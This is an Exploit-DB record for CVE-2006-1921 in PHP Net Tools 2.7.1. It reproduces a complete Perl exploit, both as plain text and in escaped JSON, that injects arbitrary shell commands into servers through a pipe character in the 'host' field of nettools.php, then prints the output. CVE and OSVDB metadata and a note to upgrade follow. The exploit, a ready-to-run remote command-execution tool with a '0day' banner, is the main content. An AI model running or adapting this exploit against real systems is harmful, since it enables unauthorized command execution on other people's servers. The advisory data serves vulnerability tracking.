ID EDB-ID:1695
Type exploitdb
Reporter FOX_MULDER
Modified 2006-04-18T00:00:00
Description
PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
use LWP 5.64;
my $hostname = $ARGV[0];
my $dir = $ARGV[1];
my $command = $ARGV[2];
if (@ARGV<2) {
print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
exit();
}
print "=======================================================\n";
print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
print "fox_mulder@abv.bg\r\n";
print "=======================================================\n";
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
print "\n\n[+]Sending request to server . . .\r\n";
my $url = "http://$hostname$dir/nettools.php";
my $response = $browser->post( $url,[
'ping' => '1',
'host' => "|$command"]);
my $code = $response->status_line;
print "[+] HTTP RESPONSE $code\n";
print "\n[+]Injecting command . . .\n";
$response->content =~ /blockquote>(.*)<\/blockquote>/s;
print "$1\n";
# milw0rm.com [2006-04-18]
{"id": "EDB-ID:1695", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit", "description": "PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform", "published": "2006-04-18T00:00:00", "modified": "2006-04-18T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1695/", "reporter": "FOX_MULDER", "references": [], "cvelist": ["CVE-2006-1921"], "lastseen": "2016-01-31T14:41:40", "viewCount": 7, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T14:41:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1921"]}, {"type": "osvdb", "idList": ["OSVDB:24783"]}], "modified": "2016-01-31T14:41:40", "rev": 2}, "vulnersScore": 7.8}, "sourceHref": "https://www.exploit-db.com/download/1695/", "sourceData": "#!/usr/bin/perl\n# PHP Net Tools Remote Code Execution Exploit\n#\n# by FOX_MULDER (fox_mulder@abv.bg)\n# Vulnerability found by FOX_MULDER.\n#\n# \"Born to be root !!!\"\n#----------------------------------+\n#PHP Net Tools |\n#Copyright (C) 2005 Eric Robertson |\n#h4rdc0d3@gmail.com |\n#----------------------------------+\n#\n# Fact:Wbyte counted twice to infinity !!!\n#\n#\n###################################################\n\tuse LWP 5.64;\n\n\tmy $hostname = $ARGV[0];\n\tmy $dir = $ARGV[1];\n\tmy $command = $ARGV[2];\n\n if (@ARGV<2) {\n\tprint \"\\nUsage: ntools.pl www.site.com /dir/ \\\"ls \\-la\\\" \\n\";\n\texit();\n\t}\n\t\n\tprint \"=======================================================\\n\";\n\tprint \"0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\\n\";\n\tprint \"PHP Net Tools Command Execution Exploit by FOX_MULDER\\n\";\n\tprint \"fox_mulder@abv.bg\\r\\n\";\n\tprint \"=======================================================\\n\";\n\n\tmy $browser = LWP::UserAgent->new;\n\t$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');\n\tprint \"\\n\\n[+]Sending request to server . . .\\r\\n\";\n\t\n\tmy $url = \"http://$hostname$dir/nettools.php\";\n\n\t\n\tmy $response = $browser->post( $url,[\n\t\t'ping' => '1',\n \t'host' => \"|$command\"]);\n\n \tmy $code = $response->status_line;\n print \"[+] HTTP RESPONSE $code\\n\";\n print \"\\n[+]Injecting command . . .\\n\";\n\t$response->content =~ /blockquote>(.*)<\\/blockquote>/s;\n\tprint \"$1\\n\";\n\n# milw0rm.com [2006-04-18]\n", "osvdbidlist": ["24783"]}
{"cve": [{"lastseen": "2021-02-02T05:27:20", "description": "nettools.php in PHP Net Tools 2.7.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter.", "edition": 4, "cvss3": {}, "published": "2006-04-20T18:06:00", "title": "CVE-2006-1921", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1921"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:php_net_tools:php_net_tools:2.7.1"], "id": "CVE-2006-1921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1921", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php_net_tools:php_net_tools:2.7.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1921"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.hotscripts.com/Detailed/47915.html\n[Secunia Advisory ID:19694](https://secuniaresearch.flexerasoftware.com/advisories/19694/)\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000840.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000839.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1695\n[CVE-2006-1921](https://vulners.com/cve/CVE-2006-1921)\n", "modified": "2006-04-18T08:32:35", "published": "2006-04-18T08:32:35", "href": "https://vulners.com/osvdb/OSVDB:24783", "id": "OSVDB:24783", "type": "osvdb", "title": "PHP Net Tools nettools.php host Variable Arbitrary Command Execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
